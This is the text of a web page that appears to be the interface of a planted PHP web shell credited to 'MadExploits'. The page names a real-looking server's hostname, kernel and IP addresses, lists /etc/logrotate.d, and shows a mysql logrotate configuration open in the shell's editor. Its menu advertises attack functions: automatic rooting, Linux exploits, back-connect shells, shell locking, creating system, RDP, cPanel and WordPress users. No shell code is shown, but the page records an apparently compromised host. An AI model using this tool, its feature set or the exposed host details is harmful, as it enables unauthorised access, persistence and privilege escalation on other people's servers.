Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.71.254.168
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
btmp
130
B
-rw-r--r--
chrony
160
B
-rw-r--r--
dnf
88
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
ea-php81-php-fpm
257
B
-rw-r--r--
ea-php82-php-fpm
257
B
-rw-r--r--
ea-php83-php-fpm
257
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
kvm_stat
162
B
-rw-r--r--
lfd
172
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
894
B
-rw-r--r--
named
514
B
-rw-r--r--
nscd_logs
180
B
-rw-r--r--
sssd
289
B
-rw-r--r--
sw-engine
114
B
-rw-r--r--
wp-toolkit-action-logs
0
B
-rw-r--r--
wtmp
145
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql
# This logname can be set in /etc/my.cnf # by setting the variable "log-error" # in the [mysqld] section as follows: # # [mysqld] # log-error=/var/lib/mysql/mysqld.log # # If the root user has a password you have to create a # /root/.my.cnf configuration file with the following # content: # # [mysqladmin] # password = <secret> # user= root # # where "<secret>" is the password. # # ATTENTION: This /root/.my.cnf should be readable ONLY # for root ! /var/lib/mysql/mysqld.log { # create 600 mysql mysql su mysql mysql notifempty daily rotate 3 missingok compress postrotate # just if mariadbd is really running if test -x /usr/bin/mysqladmin && \ /usr/bin/mysqladmin ping &>/dev/null then /usr/bin/mysqladmin --local flush-error-log \ flush-engine-log flush-general-log flush-slow-log fi endscript }
Close